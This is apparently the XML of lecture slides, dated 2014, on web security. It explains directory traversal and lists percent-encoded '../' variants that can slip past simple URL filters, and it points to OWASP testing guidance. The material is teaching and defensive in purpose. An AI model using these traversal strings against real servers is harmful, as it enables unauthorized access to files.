          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2057994325"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>documents are accessible from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>root path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the server does not verify the URLs, we can access other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classical example: directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>traversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>find</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>traversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2511043795"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352263" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8229600" cy="1139825"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Traversal Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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81000" y="990600"/>
            <a:ext cx="6765377" cy="5418666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3349339536"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372738" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Avoiding Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372739" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some web app. check the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, these applications are still vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to “percent encoded” URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2e%2e/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..%2f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2e%2e%2f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2e%2e%5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UTF8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encoding, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security of the application depends on the encoding allowed by the web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3800700423"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374786" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Avoiding Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Web Application Security Project (OWASP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Testing_for_Path_Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2723629567"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Abusing Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interactive web sites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (e-commerce, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>banking, etc.) are created with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are written in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client fills them up and clicks on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>button</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The button generates a request containing all the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The request calls a script that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>performs an operation with the parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and returns a web page as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184369111"/>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ooter Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385032" name="Picture 8" descr="malwares_exploits_xss_acunetix_01"/>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62000" y="1600200"/>
            <a:ext cx="7772400" cy="3829050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
